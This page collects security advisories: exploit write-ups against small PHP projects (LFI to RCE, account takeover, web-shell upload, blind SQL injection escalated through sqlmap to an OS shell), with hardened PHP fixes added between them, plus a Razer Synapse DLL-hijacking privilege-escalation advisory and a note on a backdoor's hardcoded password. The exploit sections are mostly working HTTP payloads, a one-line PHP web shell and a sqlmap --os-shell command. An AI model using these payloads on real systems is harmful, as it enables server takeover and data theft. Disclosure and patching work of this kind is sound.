<pre><code># Title: Message System 1.0 LFI To RCE
# Author: Hejap Zairy
# Date: 29.07.2022
# Vendor: https://www.sourcecodester.com/php/15249/message-system-phpoop-free-source-code.html
# Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pmms_1.zip
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache

# Vulnerable Code (PHP)
The require_once() target needs more filtering: the included page name is derived from the "page" parameter without restricting it to known pages.

```
require_once('config.php');
$page = isset($_GET['page']) ? $_GET['page'] : 'registration';
$page_name = explode("/",$page)[count(explode("/",$page)) -1];
```

[+] Payload GET

```
GET /pmms/registration?page=../../../0day&515=%74%79%70%65%20%43%3a%5c%30%64%61%79%5f%48%65%6a%61%70%5f%2e%74%78%74%20%26%26%20%64%69%72%20%43%3a%5c HTTP/1.1
Host: 0day.gov
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 354
Cookie: PHPSESSID=c9sbs70le23qois1riekoj8osg
Upgrade-Insecure-Requests: 1
```

#Status: CRITICAL

#Response
```
Hegap Zairy 0day Volume in drive C is OS
Volume Serial Number is 2EF1-9DCA

 Directory of C:\

03/18/2022 10:27 AM <DIR> Program Files
03/21/2022 01:45 PM <DIR> Program Files (x86)
03/02/2022 11:04 PM <DIR> Python27
03/26/2022 08:33 PM <DIR> Temp
03/26/2022 08:45 PM <DIR> Users
```

# Description:
Local File Inclusion is an attack technique in which attackers trick a web application into running or exposing files on the web server; when the included file is executed, the inclusion can be converted into remote code execution (RCE).

# Proof and Exploit:
https://i.imgur.com/jTqaEXn.png
</code></pre>
<pre>
<code># Title: Fingerprint Attendance 1.0 Account Takeover
# Author: Hejap Zairy
# Date: 29.07.2022
# Vendor: https://www.vetbossel.in/fingerprint-attendance-project-php/
# Software: https://app.box.com/s/xlyqalhvayq8oi25tqykcbouzrrjytqy
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache
Fingerprint Attendance is vulnerable to unauthenticated account takeover.
An attacker can take over any registered 'Staff' user account just by sending the POST request below,
changing the "id", "firstname", "lastname", "username", "password" and "type" parameters.
# Steps to Reproduce
1. Send the POST request below, changing the "id", "firstname", "lastname", "username", "password" and "type" parameters.
2. Go to /fingerprint/src/ and log in to the user account with the changed username and password.
# Vulnerable Code (PHP)
```
<?php
echo "document.getElementById('fname').value = '".$qry["first_name"]."';";
echo "document.getElementById('lname').value = '".$qry["last_name"]."';";
echo "document.getElementById('NRIC').value = '".$qry["NRIC"]."';";
echo "document.getElementById('email').value = '".$qry["email"]."';";
echo "document.getElementById('contact').value = '".$qry["mobile"]."';";
echo "document.getElementById('contact2').value = '".$qry["mobile2"]."';";
echo "document.getElementById('line1').value = '".$qry["password"]."';"; // note: the stored password column is written into the 'line1' form field
echo "document.getElementById('line2').value = '".$qry["line1"]."';";
echo "document.getElementById('line3').value = '".$qry["line2"]."';";
echo "document.getElementById('city').value = '".$qry["city"]."';";
echo "document.getElementById('zip').value = '".$qry["zip"]."';";
echo "document.getElementById('country').value = '".$qry["country"]."';";
echo "document.getElementById('bankName').value = '".$qry["bankName"]."';";
echo "document.getElementById('bankDetail').value = '".$qry["bankDetail"]."';";
echo "document.getElementById('job').value = '".$qry["jobTitle"]."';";
?>
```
# Description:
Account takeover is one form of identity theft attack in which bad actors gain access to an account and make unauthorized transactions. Account takeover attacks can target any website that uses a login to guard valuable information.
[+] Payload POST
```
POST /fingerprint/src/register.php HTTP/1.1
Host: 0day.gov
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3324626841792192532944123116
Content-Length: 2446
Origin: http://0day.gov
Connection: close
Referer: http://0day.gov/fingerprint/src/register.php
Cookie: PHPSESSID=64cp9kf4qmus9p55o63clicu2q
Upgrade-Insecure-Requests: 1

-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="fname"
Admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="lname"
admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="NRIC"
Admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="emailaddress"
[email protected]
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="contact"
admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="contact2"
admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="password"
admin12345
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="line2"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="line3"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="city"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="zip"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="country"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="bankName"
Admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="bankDetail"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="job"
Admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="button"
Register
-----------------------------3324626841792192532944123116--
```
</code></pre>
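The takeover above works because the record being read and written is chosen by request parameters, and the prefill code copies the stored password column into the page. The following is an added example of a hardened profile handler; it is not the project's code. It assumes a "staff" table with the column names used in the snippet above, a session key $_SESSION['staff_id'] set at login, password hashes stored with password_hash(), and placeholder connection details.

```php
<?php
// Added example, not the project's code. Hardened replacement for the profile
// prefill shown above and for the profile update that the POST to register.php
// performs: the staff record is always the one bound to the authenticated
// session (never an "id" sent by the client), changing the password requires
// the current password, and the stored password is never written into the page.
// Connection details, the "staff" table name and $_SESSION['staff_id'] are assumptions.
declare(strict_types=1);
session_start();

if (!isset($_SESSION['staff_id'])) {
    http_response_code(401);
    exit('Login required');
}
$staffId = (int) $_SESSION['staff_id'];

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
$con = new mysqli('localhost', 'app', 'secret', 'fingerprint'); // placeholder credentials
$con->set_charset('utf8mb4');

// DOM id => column, for the columns the form may show and edit. The password
// column is deliberately absent from this map.
const PROFILE_FIELDS = [
    'fname' => 'first_name', 'lname' => 'last_name', 'NRIC' => 'NRIC',
    'email' => 'email', 'contact' => 'mobile', 'contact2' => 'mobile2',
    'line1' => 'line1', 'line2' => 'line2', 'city' => 'city', 'zip' => 'zip',
    'country' => 'country', 'bankName' => 'bankName',
    'bankDetail' => 'bankDetail', 'job' => 'jobTitle',
];

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Update only allow-listed columns, and only the caller's own row.
    $sets = [];
    $types = '';
    $values = [];
    foreach (PROFILE_FIELDS as $domId => $column) {
        if (isset($_POST[$domId])) {
            $sets[] = "`$column` = ?";
            $types .= 's';
            $values[] = (string) $_POST[$domId];
        }
    }
    // A password change is re-authenticated with the current password.
    if (isset($_POST['new_password']) && $_POST['new_password'] !== '') {
        $stmt = $con->prepare('SELECT password FROM staff WHERE id = ?');
        $stmt->bind_param('i', $staffId);
        $stmt->execute();
        $current = $stmt->get_result()->fetch_assoc();
        $stmt->close();
        $supplied = (string) ($_POST['current_password'] ?? '');
        if ($current === null || !password_verify($supplied, $current['password'])) {
            http_response_code(403);
            exit('Current password required to change credentials');
        }
        $sets[] = '`password` = ?';
        $types .= 's';
        $values[] = password_hash((string) $_POST['new_password'], PASSWORD_DEFAULT);
    }
    if ($sets !== []) {
        $stmt = $con->prepare('UPDATE staff SET ' . implode(', ', $sets) . ' WHERE id = ?');
        $types .= 'i';
        $values[] = $staffId;
        $stmt->bind_param($types, ...$values);
        $stmt->execute();
        $stmt->close();
    }
}

// Prefill: read back the caller's own row; the password column is not selected.
$columns = implode(', ', array_map(fn ($c) => "`$c`", PROFILE_FIELDS));
$stmt = $con->prepare("SELECT $columns FROM staff WHERE id = ?");
$stmt->bind_param('i', $staffId);
$stmt->execute();
$qry = $stmt->get_result()->fetch_assoc() ?? [];
$stmt->close();

echo "<script>\n";
foreach (PROFILE_FIELDS as $domId => $column) {
    // json_encode() yields a JS string literal, so a stored value cannot break
    // out of the quotes the way the raw echo in the original allows.
    printf("document.getElementById(%s).value = %s;\n",
        json_encode($domId),
        json_encode((string) ($qry[$column] ?? ''),
            JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT));
}
echo "</script>\n";
```

The two decisions that close the reported issue are that the row id comes from the server-side session rather than the request, and that the SELECT for the prefill never includes the password column; everything else (prepared statements, JSON-encoded output) removes the secondary SQL and script injection surface the raw string concatenation leaves open.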
<pre><code># Title: Fingerprint Attendance 1.0 Shell Upload
# Author: Hejap Zairy
# Date: 28.07.2022
# Vendor: https://www.vetbossel.in/fingerprint-attendance-project-php/
# Software: https://app.box.com/s/xlyqalhvayq8oi25tqykcbouzrrjytqy
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache

A registered user can bypass the WAF and upload .php.jpg files in the attachments section by editing the raw request with the intercept tool in Burp Suite.

# Vulnerable Code (PHP)
The NRIC photo upload needs more filtering: the stored name and extension are taken from the client-supplied filename, and getimagesize() is the only content check.

```
<?php

$namae = $_POST["NRIC"]; // this will be nric
$target_dir = "photo/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
// Check if image file is an actual image or fake image
if(isset($_POST["submit"])) {
 $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
 if($check !== false) {
 //echo "File is an image - " . $check["mime"] . ".";
 $uploadOk = 1;
 } else {
 // echo "File is not an image.";
 $uploadOk = 0;
 }
}
```

[+] Payload POST

```
POST /fingerprint/src/register.php HTTP/1.1
Host: 0day.gov
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3324626841792192532944123116
Content-Length: 2446
Origin: http://0day.gov
Connection: close
Referer: http://0day.gov/fingerprint/src/register.php
Cookie: PHPSESSID=64cp9kf4qmus9p55o63clicu2q
Upgrade-Insecure-Requests: 1

-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="fname"
Admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="lname"

admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="NRIC"
Admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="emailaddress"
Admin@gmail.com
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="contact"

admin

-----------------------------3324626841792192532944123116

Content-Disposition: form-data; name="contact2"
admin
-----------------------------3324626841792192532944123116

Content-Disposition: form-data; name="line1"

-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="line2"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="line3"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="city"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="zip"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="country"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="bankName"
Admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="bankDetail"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="job"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="fileToUpload"; filename="0day_hejap.png.php"
Content-Type: image/jpg

<?=`$_GET[515]`?>


-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="button"
Register
-----------------------------3324626841792192532944123116--
```

#Status: CRITICAL

[+] Payload GET

```
GET /fingerprint/src/photo/0day_hejap.php?515=echo+Hejap+Zairy HTTP/1.1

Host: 0day.gov
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=pqbgvck1gedt9if6p582nt9a41
Upgrade-Insecure-Requests: 1
```

#Response
```
HTTP/1.1 200 OK
Date: Thu, 29 Mar 2022 11:15:56 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-Powered-By: PHP/7.4.27
Content-Length: 12
Connection: close
Content-Type: text/html; charset=UTF-8

Hejap Zairy
```

# Description:
A WAF-bypassing file upload vulnerability occurs when a user is able to upload an executable script file and then use that file to execute commands on the server. This attack is among the most direct and effective, and sometimes has almost no technical barrier.

# Proof and Exploit:
https://i.imgur.com/A3BlWTF.png
</code></pre>
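The upload snippet above keeps the client's filename (and therefore its extension) and only consults getimagesize(), so the stored name, the extension and the serving directory are all under the uploader's control. The block below is an added example of a hardened upload handler; it is not the project's code. The PHOTO_DIR location, the size limit and the accepted image types are assumptions, as is the "fileToUpload"/"submit" field naming reused from the snippet.

```php
<?php
// Added example, not the project's code. Hardened replacement for the photo
// upload shown above: the type is detected from file content, the extension is
// assigned by the server from that type, the stored name is random, and files
// land in a directory outside the web root with no execute bit.
// PHOTO_DIR, MAX_BYTES and ALLOWED_IMAGE_TYPES are assumptions for this example.
declare(strict_types=1);

const PHOTO_DIR = __DIR__ . '/../private_uploads/photo'; // outside the document root
const MAX_BYTES = 2 * 1024 * 1024;

// Detected MIME type => extension the server will assign. Nothing else is stored.
const ALLOWED_IMAGE_TYPES = [
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
];

/**
 * Validate one $_FILES entry and store it. Returns [true, storedName] on
 * success or [false, reason] for the caller to log.
 */
function storePhoto(array $file): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return [false, 'upload error ' . (string) $file['error']];
    }
    if ($file['size'] > MAX_BYTES) {
        return [false, 'file too large'];
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return [false, 'not an uploaded file'];
    }

    // Detect the type from the bytes, not from the client's Content-Type part
    // header or filename; both were attacker-controlled in the advisory.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_IMAGE_TYPES[$mime])) {
        return [false, "rejected type $mime"];
    }
    // getimagesize() must agree with finfo and the image must actually decode.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info['mime'] !== $mime) {
        return [false, 'not a decodable image'];
    }

    // Server-generated name: no user input reaches the filesystem path.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
    if (!is_dir(PHOTO_DIR) && !mkdir(PHOTO_DIR, 0750, true)) {
        return [false, 'cannot create photo dir'];
    }
    $dest = PHOTO_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return [false, 'move failed'];
    }
    chmod($dest, 0640); // readable by the app, never executable
    return [true, $name];
}

if (isset($_POST['submit'], $_FILES['fileToUpload'])) {
    [$ok, $result] = storePhoto($_FILES['fileToUpload']);
    if (!$ok) {
        error_log('photo upload rejected: ' . $result);
        http_response_code(400);
        exit('Upload rejected');
    }
    // $result is the stored name. Persist it against the staff record and serve
    // it later through a script that sets Content-Type from the stored type,
    // rather than exposing the upload directory to the web server directly.
}
```

Rejections are logged with the reason so that repeated attempts to upload non-image content from one account show up in the application log, which is the detection signal a defender has for this class of bug.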
<pre><code># Title: Fingerprint Attendance 1.0 Blind boolean SQLi To Rce
# Author: Hejap Zairy
# Date: 28.07.2022
# Vendor: https://www.vetbossel.in/fingerprint-attendance-project-php/
# Software: https://app.box.com/s/xlyqalhvayq8oi25tqykcbouzrrjytqy
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache

# Steps
# 1 - Go to: https://0day.gov/fingerprint/login.php
# 2 - Manually inject the blind SQLi payload: username=hejap' OR NOT 8425=8425#&password=hejap&button=Login
# 3 - SQLi to RCE (r00t)
# 4 - Upload webshell
# 5 - Web shell to meterpreter full tty shell

# Vulnerable Code (PHP)

```
$user = $_POST['username'];
$pass = sha1($_POST['password']);
$passwrong = false;

 if(isSet($_POST["button"]))
 switch($_POST["button"]){
 case "Login" :
 $passwrong = login($con, $user, $pass); //echo "Login";
 break;
 } // ----------------- Inside if(isSet($_POST["button"]))----------------
```

#Status: CRITICAL
[+] Payload POST

```
POST /fingerprint/src/ HTTP/1.1
Host: 0day.gov
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: http://0day.gov
Connection: close
Referer: http://0day.gov/fingerprint/src/
Cookie: PHPSESSID=c9sbs70le23qois1riekoj8osg
Upgrade-Insecure-Requests: 1

username=hejap'+OR+NOT+8425=8425#&password=hejap&button=Login
```

```
---
Parameter: username (POST)
 Type: boolean-based blind
 Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
 Payload: username=hejap' OR NOT 8425=8425#&password=hejap&button=Login
---
```

#Blind SQLi Time to Rce
#Exploit

sqlmap -r 0day_Hejap.txt -p username
' --hex --dbms=mysql --technique=b --random-agent --eta -D ad_39 -T login --dump --os-shell --priv-esc --forms --eta

# Description:
The blind boolean SQLi vulnerability was converted to RCE due to the permissions I have in the database, and it was privesc.

# Proof and Exploit:
https://i.imgur.com/uYBA1C3.png
https://i.imgur.com/nQFdjNu.png
</code></pre>
<pre><code># Title: Sports Complex Booking System 1.0 LFI To RCE
# Author: Hejap Zairy
# Date: 28.07.2022
# Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html
# Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache

# Vulnerable Code (PHP)
The require_once() target needs more filtering: the page is taken directly from the "p" parameter.

```php
<?php $page = isset($_GET['p']) ? $_GET['p'] : 'home'; ?>
<?php require_once('inc/topBarNav.php') ?>
 <?php if($_settings->chk_flashdata('success')): ?>
 <script>
 alert_toast("<?php echo $_settings->flashdata('success') ?>",'success')
 </script>
```

[+] Payload GET

```
GET /scbs/?p=../../../0day&515=%64%69%72%20%43%3a%5c HTTP/1.1
Host: 0day.gov
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=c9sbs70le23qois1riekoj8osg
Upgrade-Insecure-Requests: 1
```

#Status: CRITICAL

#Response
```
HTTP/1.1 200 OK
Date: Sun, 28 Mar 2022 08:05:28 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-Powered-By: PHP/7.4.27
Content-Length: 17
Connection: close
Content-Type: text/html; charset=UTF-8

</script> Volume in drive C is OS
 Volume Serial Number is 2EF1-9DCA

 Directory of C:\

03/26/2022 08:51 PM <DIR> 0day
03/26/2022 02:12 PM 19 0day.php
03/17/2022 06:06 AM 12,288 DumpStack.log
03/24/2022 07:14 PM <DIR> Intel
10/31/2021 12:47 AM <DIR> MinGW
10/31/2021 12:58 AM <DIR> mingw32
05/12/2018 08:20 PM <DIR> mingw64
10/31/2021 12:47 AM <DIR> msys64
01/02/2022 09:28 AM <DIR> pen
06/05/2021 03:10 PM <DIR> PerfLogs
03/18/2022 10:27 AM <DIR> Program Files
03/21/2022 01:45 PM <DIR> Program Files (x86)
03/02/2022 11:04 PM <DIR> Python27
01/30/2022 02:34 PM 474 t.txt
03/26/2022 08:33 PM <DIR> Temp
03/26/2022 08:45 PM <DIR> Users
```

# Description:
Local File Inclusion is an attack technique in which attackers trick a web application into running or exposing files on the web server; when the included file is executed, the inclusion can be converted into remote code execution (RCE).

# Proof and Exploit:
https://i.imgur.com/tUWZM0X.png
https://i.imgur.com/vrPCGTp.png
https://i.imgur.com/sMyZder.png
</code></pre>
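Both LFI advisories on this page (Message System 1.0 with $_GET['page'], and Sports Complex Booking System 1.0 with $_GET['p']) share the same root cause: a request parameter becomes part of the path handed to require_once(). The block below is an added example of the standard fix; it is not either project's code. The PAGE_MAP entries, the pages/ directory and the default page names are assumptions.

```php
<?php
// Added example, not the projects' code. Replaces the user-controlled
// require_once() in Message System 1.0 and Sports Complex Booking System 1.0.
// The request value is only a key into a fixed map of includable files, so no
// request-supplied string is ever used as (part of) a filesystem path.
// PAGE_MAP and the pages/ directory are assumptions for this example.
declare(strict_types=1);

const PAGE_MAP = [
    'home'         => 'pages/home.php',
    'registration' => 'pages/registration.php',
    'login'        => 'pages/login.php',
];

/**
 * Resolve a request parameter to an includable file, or null if it is not one
 * of the known pages. "../", "/", null bytes and so on never reach the map
 * because the identifier check rejects them first.
 */
function resolvePage(?string $requested, string $default = 'home'): ?string
{
    if ($requested === null || $requested === '') {
        $requested = $default;
    }
    if (!preg_match('/^[a-z0-9_]{1,32}$/', $requested)) {
        return null;
    }
    return PAGE_MAP[$requested] ?? null;
}

/**
 * Second line of defence for any code path that still has to build a path
 * dynamically: confirm the resolved file really lives under $baseDir.
 * realpath() collapses ".." and symlinks, so the comparison is on the
 * canonical path, and the trailing separator prevents "/pages_evil" from
 * matching "/pages".
 */
function isInsideBaseDir(string $path, string $baseDir): bool
{
    $real = realpath($path);
    $base = realpath($baseDir);
    if ($real === false || $base === false) {
        return false;
    }
    return strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0;
}

// Message System used the "page" parameter with default 'registration';
// Sports Complex used "p" with default 'home'. Either fits the same resolver.
$pageFile = resolvePage($_GET['page'] ?? null, 'registration');
if ($pageFile === null || !isInsideBaseDir(__DIR__ . '/' . $pageFile, __DIR__ . '/pages')) {
    http_response_code(404);
    exit('Unknown page');
}
require_once __DIR__ . '/' . $pageFile;
```

The map is the actual control; the realpath() check is belt-and-braces for code that later grows a dynamic path, and it only helps if the target exists, since realpath() returns false for a missing file.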
<pre><code>Advisory ID: SYSS-2021-058
Product: Razer Synapse
Manufacturer: Razer Inc.
Affected Version(s): Versions prior to 3.7.0228.022817
Tested Version(s): 3.6.0920.091710, 3.6.1010.101113, 3.6.1018.101823,
 3.6.1130.111217, 3.6.1201.111814, 3.7.0131.011810
Vulnerability Type: Improper Privilege Management (CWE-269)
Risk Level: Critical
Solution Status: Fixed
Manufacturer Notification: 2021-10-18
Solution Date: 2022-03-07
Public Disclosure: 2022-03-23
CVE Reference: CVE-2021-44226
Authors of Advisory: Dr. Oliver Schwarz, SySS GmbH
 Matthias Deeg, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Razer Synapse is an additional driver software for Razer gaming devices.
The manufacturer describes the product as a "unified cloud-based hardware
configuration tool" (see [1]).

Due to an unsafe installation path and improper privilege management,
the associated system service "Razer Synapse Service" is vulnerable to
DLL hijacking.
As a result, local Windows users can abuse the Razer driver installer to
obtain administrative privileges on Windows.

In order to exploit the vulnerability, the attacker needs physical
access to the machine and needs to prepare the attack before Razer
Synapse is installed along with a Razer driver.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The attack scenario considers a Windows machine without any previous
installation of any Razer device or software.
The attacker has a local unprivileged Windows account, physical access
to the machine, and a device which is either a Razer peripheral or able
to pretend to be one (such as a Bash Bunny or a Raspberry Pi Zero).
The attacker aims at executing code with full system privileges.

The attack exploits the Razer Synapse Service which runs with elevated
privileges. While the main binary of the service is stored in the
protected location "C:\Program Files (x86)\Razer\Synapse3\Service", it
dynamically loads libraries from
"C:\ProgramData\Razer\Synapse3\Service\bin".
Before the installation, standard users can write to this path, since
"C:\ProgramData" is world-writable on a standard installation of Windows.

The Synapse installation procedure changes access privileges, so that
standard users cannot write to the path any longer. In addition, it
removes any previous files in that location.
Furthermore, upon service start, the location is checked for DLLs that
do not originate from Razer.

However, if the path is created before the driver installation, the
creator remains owner of the object and can still change directory and
file permissions. In particular, the creator can deny access for the
SYSTEM user and grant access for the attacker's user.

The attack consists of three phases:

1. Before the installation of the driver/Synapse, the attacker creates
 "C:\ProgramData\Razer\Synapse3\Service" and denies write-access for
 SYSTEM.

2. Afterwards, the attacker triggers the installation of Synapse.
 This can be done without any elevated privileges by plugging in a
 Razer device and following the installation procedure for Synapse,
 if device-specific co-installers are not disabled.
 Alternatively, a device such as Bash Bunny or a Raspberry Pi Zero
 can be used and pretend to be a Razer device.

3. After the installation of Synapse has finished, the attacker grants
 full access to "C:\ProgramData\Razer\Synapse3" for both the SYSTEM
 user and the own low-privileged user account. Afterwards, the
 attacker places a prepared set of DLLs into
 "C:\ProgramData\Razer\Synapse3\Service\bin" and restarts the Razer
 Synapse Service, typically, by restarting the machine.

SySS GmbH chose the following set of DLLs for a proof of concept:

* RzLightingEngine.dll from the original installation
* RSy3_LightingEffects.dll from the original installation
* userenv_orig.dll, a copy from the standard Windows DLL at
 "C:\Windows\SysWOW64\userenv.dll"
* userenv.dll, a malicious 32-bit DLL that creates a new admin user
 and redirects to userenv_orig.dll otherwise

The attack has been successfully tested for the following versions of
Razer Synapse:

* 3.6.0920.091710
* 3.6.1010.101113
* 3.6.1018.101823
* 3.6.1130.111217
* 3.6.1201.111814

A modified version of the exploit has been successfully tested
against version 3.7.0131.011810.

The attack has been successfully tested on the following versions of
Windows:

* Windows 10 Enterprise 20H2 19042.1237
* Windows 10 Pro 20H2 19042.1237
* Windows 10 Pro 21H1 19043.1237
* Windows 10 Pro 21H1 19043.1266

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Razer has published a patched version that will be deployed automatically
upon driver installation on current Windows builds.

To prevent similar attacks through other co-installers, system
administrators can disable them by setting the following key in the
Windows registry:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Installer\DisableCoInstallers = 1

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-10-07: Vulnerability discovered
2021-10-11: Initial contact to Razer support
2021-10-18: Vulnerability reported to manufacturer
2022-01-18: First direct contact with developer team
2022-02-03: First fix attempt (3.7.0131.011810) announced to SySS GmbH
2022-03-07: Final fix (3.7.0228.022817) announced to SySS GmbH
2022-03-23: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Razer Synapse 3
 https://www2.razer.com/eu-en/synapse-3
[2] SySS Security Advisory SYSS-2021-058
 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-058.txt
[3] SySS Responsible Disclosure Policy
 https://www.syss.de/en/responsible-disclosure-policy
[4] SySS Proof of Concept Video
 https://www.youtube.com/watch?v=P75BtYcnZ-A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Dr. Oliver Schwarz of SySS GmbH.

E-Mail: oliver.schwarz@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Oliver_Schwarz.asc
Key ID: 0x9716294F1294280D
Key Fingerprint: D452 B014 E992 2886 E799 6B43 9716 294F 1294 280D

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
</code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/b24c56abb4bde960c2d51d4e509d2c68_B.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Cafeini.b
Vulnerability: Weak Hardcoded Credentials
Family: Cafeini
Type: PE32
MD5: b24c56abb4bde960c2d51d4e509d2c68
Vuln ID: MVID-2022-0526
Disclosure: 03/25/2022
Description: The malware listens on TCP port 51966. Authentication is required, however the password "speedfire" is weak and hardcoded in the PE file.

Commands:
REGISTRYTOOLS or RT <ON/OFF> - access to REGEDIT.EXE
REGISTRYTOOLS or RT <ON/OFF> - access to the REGEDIT.EXE program
TELNET <NAME> [PORT] - telnet to remote computer NAME on port PORT (default 23)
KILL <NAME> or <PID> - kills process NAME or PID (both from command PS)
DIR or LS [PATH] - shows files in current directory
